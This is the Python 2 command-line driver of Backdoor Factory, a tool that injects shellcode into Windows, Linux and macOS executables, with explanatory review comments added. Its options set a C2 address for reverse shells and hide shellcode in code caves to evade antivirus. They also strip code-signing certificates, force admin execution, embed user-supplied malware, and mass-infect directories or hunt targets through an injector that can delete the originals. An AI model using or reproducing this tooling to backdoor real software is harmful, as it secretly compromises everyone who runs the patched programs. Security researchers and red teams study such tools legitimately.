#!/usr/bin/env python2 ''' BackdoorFactory (BDF) v3 - FOUNTAINPATCH Many thanks to Ryan O'Neill --ryan 'at' codeslum org-- Without him, I would still be trying to do stupid things with the elf format. Also thanks to Silvio Cesare with his 1998 paper (http://vxheaven.org/lib/vsc01.html) which these ELF patching techniques are based on. Special thanks to Travis Morrow for poking holes in my ideas. Copyright (c) 2013-2017, Joshua Pitts All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
from machobin import machobin


def signal_handler(signal, frame):
    # SIGINT handler: print a farewell line and exit with status 0.
    # The first parameter shadows the `signal` module inside this body; that
    # is harmless here because the body never references it.
    print '\nProgram Exit'
    sys.exit(0)


class bdfMain():
    # NOTE: this class body *is* the program.  Everything below -- signal
    # registration, option parsing, the banner, format detection and the
    # per-format dispatch (including the sys.exit() calls) -- runs while the
    # `class` statement itself is executed, i.e. at definition/import time.
    # The `bdfMain()` call at the bottom of the file only instantiates an
    # empty class afterwards.

    version = """\
    Version: 3.4.2
    """

    author = """\
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    ALERT: NEW VERSION Available
    *** ONLY AVAILABLE TO SPONSORS ***
    SPONSOR HERE: https://github.com/sponsors/secretsquirrel

    Author: Joshua Pitts
    Email: the.midnite.runr[-at ]gmailcom
    Twitter: @ausernamedjosh
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    """

    #ASCII ART
    # Three banner variants; one is chosen at random by `choice(menu)` below.
    # Each entry is built from adjacent string literals (implicit
    # concatenation); the backslash sequences are deliberately invalid
    # escapes that Python 2 keeps literally.
    menu = ["-.(`-') (`-') _ <-" ".(`-') _(`-') (`-')\n"
            "__( OO) (OO ).-/ _ __( OO)" "( (OO ).-> .-> .-> <-.(OO ) \n"
            "'-'---.\ / ,---. \-,-----.'-'. ,--" ".\ .'_ (`-')----. (`-')----. ,------,) \n"
            "| .-. (/ | \ /`.\ | .--./| .' /" "'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
            "| '-' `.) '-'|_.' | /_) (`-')| /)" "| | ' |( _) | | |( _) | | || |_.' | \n"
            "| /`'. |(| .-. | || |OO )| . ' |" " | / : \| |)| | \| |)| || . .' \n"
            "| '--' / | | | |(_' '--'\| |\ \|" " '-' / ' '-' ' ' '-' '| |\ \ \n"
            "`------' `--' `--' `-----'`--' '--'" "`------' `-----' `-----' `--' '--' \n"
            " (`-') _ (`-') " " (`-') \n"
            " <-. (OO ).-/ _ ( OO).-> " " .-> <-.(OO ) .-> \n"
            "(`-')-----./ ,---. \-,-----./ '._" " (`-')----. ,------,) ,--.' ,-. \n"
            "(OO|(_\---'| \ /`.\ | .--./|'--...__)" "( OO).-. '| /`. '(`-')'.' / \n"
            " / | '--. '-'|_.' | /_) (`-')`--. .--'" "( _) | | || |_.' |(OO \ / \n"
            " \_) .--'(| .-. | || |OO ) | | " " \| |)| || . .' | / /) \n"
            " `| |_) | | | |(_' '--'\ | | " " ' '-' '| |\ \ `-/ /` \n"
            " `--' `--' `--' `-----' `--' " " `-----' `--' '--' `--' \n",
            "__________ " " __ .___ \n"
            "\______ \_____ ____ " "| | __ __| _/____ ___________ \n"
            " | | _/\__ \ _/ ___\|" " |/ // __ |/ _ \ / _ \_ __ \ \n"
            " | | \ / __ \\\\ \__" "_| | <_> ) | \/\n"
            " |______ /(____ /\___ >" "__|_ \____ |\____/ \____/|__| \n"
            " \/ \/ \/" " \/ \/ \n"
            "___________ " "__ \n"
            "\_ _____/____ _____/" " |_ ___________ ___.__. \n"
            " | __) \__ \ _/ ___\ " " __\/ _ \_ __ < | | \n"
            " | \ / __ \\\\ \__" "_| | ( <_> ) | \/\___ | \n"
            " \___ / (____ /\___ >_" "_| \____/|__| / ____| \n"
            " \/ \/ \/ " " \/ \n",
            " ____ ____ ______ " " __ \n"
            " / __ )/ __ \/ ____/___ " "______/ /_____ _______ __\n"
            " / __ / / / / /_ / __ `/" " ___/ __/ __ \/ ___/ / / /\n"
            " / /_/ / /_/ / __/ / /_/ /" " /__/ /_/ /_/ / / / /_/ /\n"
            "/_____/_____/_/ \__,_/" "\___/\__/\____/_/ \__, /\n"
            " " " /____/\n"]

    # Installed at class-definition time, so Ctrl-C is trapped for the whole
    # run, including the interactive prompt in directory mode.
    signal.signal(signal.SIGINT, signal_handler)

    # ---- command-line options -------------------------------------------
    # All option values land on `options` (dest names are UPPER_CASE) and are
    # forwarded positionally to the pebin/elfbin/machobin constructors below.
    parser = OptionParser()
    parser.add_option("-f", "--file", dest="FILE", action="store",
                      type="string",
                      help="File to backdoor")
    parser.add_option("-s", "--shell", default="show", dest="SHELL",
                      action="store", type="string",
                      help="Payloads that are available for use."
                      " Use 'show' to see payloads."
                      )
    parser.add_option("-H", "--hostip", default=None, dest="HOST",
                      action="store", type="string",
                      help="IP of the C2 for reverse connections.")
    parser.add_option("-P", "--port", default=None, dest="PORT",
                      action="store", type="int",
                      help="The port to either connect back to for reverse "
                      "shells or to listen on for bind shells")
    parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
                      default=False, action="store_true",
                      help="Select this options if you want to use code cave"
                      " jumping to further hide your shellcode in the binary."
                      )
    parser.add_option("-a", "--add_new_section", default=False,
                      dest="ADD_SECTION", action="store_true",
                      help="Mandating that a new section be added to the "
                      "exe (better success) but less av avoidance")
    parser.add_option("-U", "--user_shellcode", default=None,
                      dest="SUPPLIED_SHELLCODE", action="store",
                      help="User supplied shellcode, make sure that it matches"
                      " the architecture that you are targeting."
                      )
    parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
                      action="store_true",
                      help="The cave flag will find code caves that "
                      "can be used for stashing shellcode. "
                      "This will print to all the code caves "
                      "of a specific size."
                      "The -l flag can be use with this setting.")
    parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
                      action="store", type="int",
                      help="For use with -c to help find code "
                      "caves of different sizes")
    parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
                      action="store", type="string",
                      help="The backdoor output file")
    parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
                      action="store", type="string",
                      help="New section name must be "
                      "less than seven characters")
    parser.add_option("-d", "--directory", dest="DIR", action="store",
                      type="string",
                      help="This is the location of the files that "
                      "you want to backdoor. "
                      "You can make a directory of file backdooring faster by "
                      "forcing the attaching of a codecave "
                      "to the exe by using the -a setting.")
    # Inverted flags: -w, -Z and -L default to True and the switch turns the
    # behaviour OFF (action="store_false").
    parser.add_option("-w", "--change_access", default=True,
                      dest="CHANGE_ACCESS", action="store_false",
                      help="This flag changes the section that houses "
                      "the codecave to RWE. Sometimes this is necessary. "
                      "Enabled by default. If disabled, the "
                      "backdoor may fail.")
    parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
                      action="store_true",
                      help="This command turns the backdoor factory in a "
                      "hunt and shellcode inject type of mechanism. Edit "
                      "the target settings in the injector module.")
    parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
                      action="store", type="string",
                      help="For use with injector, places a suffix"
                      " on the original file for easy recovery")
    parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
                      default=False, action="store_true",
                      help="For use with injector module. This command"
                      " deletes the original file. Not for use in production "
                      "systems. *Author not responsible for stupid uses.*")
    parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
                      type="int", action="store",
                      help="Starting point on disk offset, in bytes. "
                      "Some authors want to obfuscate their on disk offset "
                      "to avoid reverse engineering, if you find one of those "
                      "files use this flag, after you find the offset.")
    parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
                      default=False, action="store_true",
                      help="To determine if the file is supported by BDF prior"
                      " to backdooring the file. For use by itself or with "
                      "verbose. This check happens automatically if the "
                      "backdooring is attempted."
                      )
    parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False,
                      action="store_true",
                      help="Future use, to help determine smallest shellcode possible in a PE file"
                      )
    parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False,
                      action="store_true",
                      help="Kills the banner."
                      )
    parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
                      action="store_true",
                      help="For debug information output.")
    parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
                      type='string', action="store",
                      help="ALL, x86, or x64 type binaries only. Default=ALL")
    parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True,
                      action="store_false",
                      help="Allows for the overwriting of the pointer to the PE certificate table"
                      " effectively removing the certificate from the binary for all intents"
                      " and purposes."
                      )
    parser.add_option("-R", "--runas_admin", dest="RUNAS_ADMIN", default=False,
                      action="store_true",
                      help="EXPERIMENTAL "
                      "Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
                      ". If this string is included in the binary, it must run as system/admin. If not "
                      "in Support Check mode it will attmept to patch highestAvailable into the manifest "
                      "if requestedExecutionLevel entry exists."
                      )
    parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True,
                      action="store_false",
                      help="Use this setting if you DON'T want to patch DLLs. Patches by default."
                      )
    parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64",
                      action="store",
                      help="For MACH-O format. If fat file, focus on which arch to patch. Default "
                      "is x64. To force x86 use -F x86, to force both archs use -F ALL."
                      )
    parser.add_option("-B", "--beacon", dest="BEACON", default=15,
                      action="store", type="int",
                      help="For payloads that have the ability to beacon out, set the time in secs"
                      )
    parser.add_option("-m", "--patch-method", dest="PATCH_METHOD", default="manual",
                      action="store", type="string",
                      help="Patching methods for PE files, 'manual','automatic', replace "
                      "and onionduke")
    parser.add_option("-b", "--user_malware", dest="SUPPLIED_BINARY", default=None,
                      action="store",
                      help="For onionduke. Provide your desired binary.")
    parser.add_option("-X", "--xp_mode", dest="XP_MODE", default=False,
                      action="store_true",
                      help="Default: DO NOT support for XP legacy machines, use -X to support XP"
                      ". By default the binary will crash on XP machines (e.g. sandboxes)")
    parser.add_option("-A", "--idt_in_cave", dest="IDT_IN_CAVE", default=False,
                      action="store_true",
                      help="EXPERIMENTAL "
                      "By default a new Import Directory Table is created in a new section, "
                      "by calling this flag it will be put in a code cave. This can cause bianry "
                      "failure is some cases. Test on target binaries first."
                      )
    parser.add_option("-C", "--code_sign", dest="CODE_SIGN", default=False,
                      action="store_true",
                      help="For those with codesigning certs wishing to sign PE binaries only. "
                      "Name your signing key and private key signingcert.cer and signingPrivateKey.pem "
                      "repectively in the certs directory it's up to you to obtain signing certs.")
    parser.add_option("-p", "--preprocess", dest="PREPROCESS", default=False,
                      action="store_true",
                      help="To execute preprocessing scripts in the preprocess directory")

    # Parses sys.argv at class-definition time; `args` (positional leftovers)
    # is never used.
    (options, args) = parser.parse_args()

    def basicDiscovery(FILE):
        # Sniff the container format from the first four bytes of FILE.
        # Returns 'PE', 'ELF', "MACHO", or None when the header is not
        # recognised.  Called as a plain function from the class body, so it
        # takes no `self`.
        #
        # Magic numbers for 64-bit little-endian, fat/universal, and 32-bit
        # little-endian Mach-O headers respectively.
        macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
                           '\xce\xfa\xed\xfe', ]

        testBinary = open(FILE, 'rb')
        header = testBinary.read(4)
        testBinary.close()
        # Substring tests, not exact-offset matches: 'MZ' / 'ELF' anywhere in
        # the first four bytes is accepted (the ELF magic is actually
        # '\x7fELF', so the 'ELF' test matches it at offset 1).  The Mach-O
        # test is an exact comparison against the whole 4-byte header.
        if 'MZ' in header:
            return 'PE'
        elif 'ELF' in header:
            return 'ELF'
        elif header in macho_supported:
            return "MACHO"
        else:
            # This bare string expression is a no-op (never printed); the
            # function simply falls through to return None.
            'Only support ELF, PE, and MACH-O file formats'
            return None

    # ---- banner ---------------------------------------------------------
    if options.NO_BANNER is False:
        print choice(menu)
        print author
        print version
        time.sleep(.5)
    else:
        print "\t Backdoor Factory"
        print author
        print version

    # ---- directory mode (-d) -------------------------------------------
    # First pass: walk the tree recursively, detect each file's format and
    # build a *bin object for it.  Only the support check uses that object in
    # this pass.
    if options.DIR:
        for root, subFolders, files in os.walk(options.DIR):
            for _file in files:
                options.FILE = os.path.join(root, _file)
                if os.path.isdir(options.FILE) is True:
                    print "Directory found, continuing"
                    continue
                is_supported = basicDiscovery(options.FILE)
                # `is "PE"` compares identity with a string literal; it works
                # here only because CPython interns these short literals.
                if is_supported is "PE":
                    supported_file = pebin(options.FILE,
                                           options.OUTPUT,
                                           options.SHELL,
                                           options.NSECTION,
                                           options.DISK_OFFSET,
                                           options.ADD_SECTION,
                                           options.CAVE_JUMPING,
                                           options.PORT,
                                           options.HOST,
                                           options.SUPPLIED_SHELLCODE,
                                           options.INJECTOR,
                                           options.CHANGE_ACCESS,
                                           options.VERBOSE,
                                           options.SUPPORT_CHECK,
                                           options.SHELL_LEN,
                                           options.FIND_CAVES,
                                           options.SUFFIX,
                                           options.DELETE_ORIGINAL,
                                           options.CAVE_MINER,
                                           options.IMAGE_TYPE,
                                           options.ZERO_CERT,
                                           options.RUNAS_ADMIN,
                                           options.PATCH_DLL,
                                           options.PATCH_METHOD,
                                           options.SUPPLIED_BINARY,
                                           options.XP_MODE,
                                           options.IDT_IN_CAVE,
                                           options.CODE_SIGN,
                                           options.PREPROCESS,
                                           )
                elif is_supported is "ELF":
                    supported_file = elfbin(options.FILE,
                                            options.OUTPUT,
                                            options.SHELL,
                                            options.HOST,
                                            options.PORT,
                                            options.SUPPORT_CHECK,
                                            options.FIND_CAVES,
                                            options.SHELL_LEN,
                                            options.SUPPLIED_SHELLCODE,
                                            options.IMAGE_TYPE,
                                            options.PREPROCESS,
                                            )
                elif is_supported is "MACHO":
                    supported_file = machobin(options.FILE,
                                              options.OUTPUT,
                                              options.SHELL,
                                              options.HOST,
                                              options.PORT,
                                              options.SUPPORT_CHECK,
                                              options.SUPPLIED_SHELLCODE,
                                              options.FAT_PRIORITY,
                                              options.BEACON,
                                              options.PREPROCESS,
                                              )

                if options.SUPPORT_CHECK is True:
                    if os.path.isfile(options.FILE):
                        is_supported = False
                        print "file", options.FILE
                        # If the format was unrecognised, `supported_file`
                        # may be unbound (or stale from a previous file);
                        # the broad except below absorbs the resulting
                        # NameError along with everything else.
                        try:
                            is_supported = supported_file.support_check()
                        except Exception, e:
                            is_supported = False
                            print 'Exception:', str(e), '%s' % options.FILE
                        if is_supported is False or is_supported is None:
                            print "%s is not supported." % options.FILE
                            #continue
                        else:
                            print "%s is supported." % options.FILE
                            # if supported_file.flItms['runas_admin'] is True:
                            #    print "%s must be run as admin." % options.FILE
                        print "*" * 50

        if options.SUPPORT_CHECK is True:
            sys.exit()

        # Second pass: interactive confirmation, then patch each entry of the
        # *top-level* listing (os.listdir, not the recursive walk above).
        print ("You are going to backdoor the following "
               "items in the %s directory:" % options.DIR)
        dirlisting = os.listdir(options.DIR)
        for item in dirlisting:
            print " {0}".format(item)
        answer = raw_input("Do you want to continue? (yes/no) ")
        if 'yes' in answer.lower():
            for item in dirlisting:
                #print item
                print "*" * 50
                # NOTE(review): this assigns `options.File` (mixed case), not
                # `options.FILE`; every use below reads `options.FILE`, which
                # therefore still holds the last path set by the os.walk loop
                # above rather than `item`.
                options.File = options.DIR + '/' + item
                if os.path.isdir(options.FILE) is True:
                    print "Directory found, continuing"
                    continue
                print ("backdooring file %s" % item)
                result = None
                is_supported = basicDiscovery(options.FILE)
                try:
                    if is_supported is "PE":
                        supported_file = pebin(options.FILE,
                                               options.OUTPUT,
                                               options.SHELL,
                                               options.NSECTION,
                                               options.DISK_OFFSET,
                                               options.ADD_SECTION,
                                               options.CAVE_JUMPING,
                                               options.PORT,
                                               options.HOST,
                                               options.SUPPLIED_SHELLCODE,
                                               options.INJECTOR,
                                               options.CHANGE_ACCESS,
                                               options.VERBOSE,
                                               options.SUPPORT_CHECK,
                                               options.SHELL_LEN,
                                               options.FIND_CAVES,
                                               options.SUFFIX,
                                               options.DELETE_ORIGINAL,
                                               options.CAVE_MINER,
                                               options.IMAGE_TYPE,
                                               options.ZERO_CERT,
                                               options.RUNAS_ADMIN,
                                               options.PATCH_DLL,
                                               options.PATCH_METHOD,
                                               options.SUPPLIED_BINARY,
                                               options.XP_MODE,
                                               options.IDT_IN_CAVE,
                                               options.CODE_SIGN,
                                               options.PREPROCESS,
                                               )
                        # -o is ignored in directory mode: the output name
                        # is always derived by output_options().
                        supported_file.OUTPUT = None
                        supported_file.output_options()
                        result = supported_file.patch_pe()
                    elif is_supported is "ELF":
                        supported_file = elfbin(options.FILE,
                                                options.OUTPUT,
                                                options.SHELL,
                                                options.HOST,
                                                options.PORT,
                                                options.SUPPORT_CHECK,
                                                options.FIND_CAVES,
                                                options.SHELL_LEN,
                                                options.SUPPLIED_SHELLCODE,
                                                options.IMAGE_TYPE,
                                                options.PREPROCESS,
                                                )
                        supported_file.OUTPUT = None
                        supported_file.output_options()
                        result = supported_file.patch_elf()
                    elif is_supported is "MACHO":
                        supported_file = machobin(options.FILE,
                                                  options.OUTPUT,
                                                  options.SHELL,
                                                  options.HOST,
                                                  options.PORT,
                                                  options.SUPPORT_CHECK,
                                                  options.SUPPLIED_SHELLCODE,
                                                  options.FAT_PRIORITY,
                                                  options.BEACON,
                                                  options.PREPROCESS,
                                                  )
                        supported_file.OUTPUT = None
                        supported_file.output_options()
                        result = supported_file.patch_macho()

                    if result is None:
                        print 'Not Supported. Continuing'
                        continue
                    else:
                        print ("[*] File {0} is in backdoored "
                               "directory".format(supported_file.FILE))
                except Exception as e:
                    # Any failure on one file is reported and the loop moves
                    # on; the exception is not re-raised.
                    print "DIR ERROR", str(e)
        else:
            print("Goodbye")
        sys.exit()

    # ---- injector mode (-i) --------------------------------------------
    # Always constructs a pebin regardless of what -f points at (no format
    # detection on this path).
    if options.INJECTOR is True:
        # NOTE(review): the positional order here is SUFFIX, CAVE_MINER,
        # DELETE_ORIGINAL, whereas every other pebin(...) call in this file
        # passes SUFFIX, DELETE_ORIGINAL, CAVE_MINER.  Since these are
        # positional arguments, one of the two orders is presumably wrong --
        # confirm against pebin's constructor signature.
        supported_file = pebin(options.FILE,
                               options.OUTPUT,
                               options.SHELL,
                               options.NSECTION,
                               options.DISK_OFFSET,
                               options.ADD_SECTION,
                               options.CAVE_JUMPING,
                               options.PORT,
                               options.HOST,
                               options.SUPPLIED_SHELLCODE,
                               options.INJECTOR,
                               options.CHANGE_ACCESS,
                               options.VERBOSE,
                               options.SUPPORT_CHECK,
                               options.SHELL_LEN,
                               options.FIND_CAVES,
                               options.SUFFIX,
                               options.CAVE_MINER,
                               options.DELETE_ORIGINAL,
                               options.IMAGE_TYPE,
                               options.ZERO_CERT,
                               options.RUNAS_ADMIN,
                               options.PATCH_DLL,
                               options.PATCH_METHOD,
                               options.SUPPLIED_BINARY,
                               options.XP_MODE,
                               options.IDT_IN_CAVE,
                               options.CODE_SIGN,
                               options.PREPROCESS,
                               )
        supported_file.injector()
        sys.exit()

    # ---- single-file mode (-f) -----------------------------------------
    if not options.FILE:
        parser.print_help()
        sys.exit()

    #OUTPUT = output_options(options.FILE, options.OUTPUT)

    is_supported = basicDiscovery(options.FILE)

    if is_supported is "PE":
        supported_file = pebin(options.FILE,
                               options.OUTPUT,
                               options.SHELL,
                               options.NSECTION,
                               options.DISK_OFFSET,
                               options.ADD_SECTION,
                               options.CAVE_JUMPING,
                               options.PORT,
                               options.HOST,
                               options.SUPPLIED_SHELLCODE,
                               options.INJECTOR,
                               options.CHANGE_ACCESS,
                               options.VERBOSE,
                               options.SUPPORT_CHECK,
                               options.SHELL_LEN,
                               options.FIND_CAVES,
                               options.SUFFIX,
                               options.DELETE_ORIGINAL,
                               options.CAVE_MINER,
                               options.IMAGE_TYPE,
                               options.ZERO_CERT,
                               options.RUNAS_ADMIN,
                               options.PATCH_DLL,
                               options.PATCH_METHOD,
                               options.SUPPLIED_BINARY,
                               options.XP_MODE,
                               options.IDT_IN_CAVE,
                               options.CODE_SIGN,
                               options.PREPROCESS,
                               )
    elif is_supported is "ELF":
        supported_file = elfbin(options.FILE,
                                options.OUTPUT,
                                options.SHELL,
                                options.HOST,
                                options.PORT,
                                options.SUPPORT_CHECK,
                                options.FIND_CAVES,
                                options.SHELL_LEN,
                                options.SUPPLIED_SHELLCODE,
                                options.IMAGE_TYPE,
                                options.PREPROCESS,
                                )
    elif is_supported is "MACHO":
        supported_file = machobin(options.FILE,
                                  options.OUTPUT,
                                  options.SHELL,
                                  options.HOST,
                                  options.PORT,
                                  options.SUPPORT_CHECK,
                                  options.SUPPLIED_SHELLCODE,
                                  options.FAT_PRIORITY,
                                  options.BEACON,
                                  options.PREPROCESS,
                                  )
    else:
        print "Not supported."
        sys.exit()

    # run_this() is the per-format entry point; its return value and the
    # object's OUTPUT attribute are set by the *bin class, not here.
    result = supported_file.run_this()

    if result is True and options.SUPPORT_CHECK is False and supported_file.OUTPUT is not None:
        print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))

#END BDF MAIN

if __name__ == "__main__":
    # By this point the class body above has already run to completion (or
    # called sys.exit()); this just creates an instance of the empty class.
    bdfMain()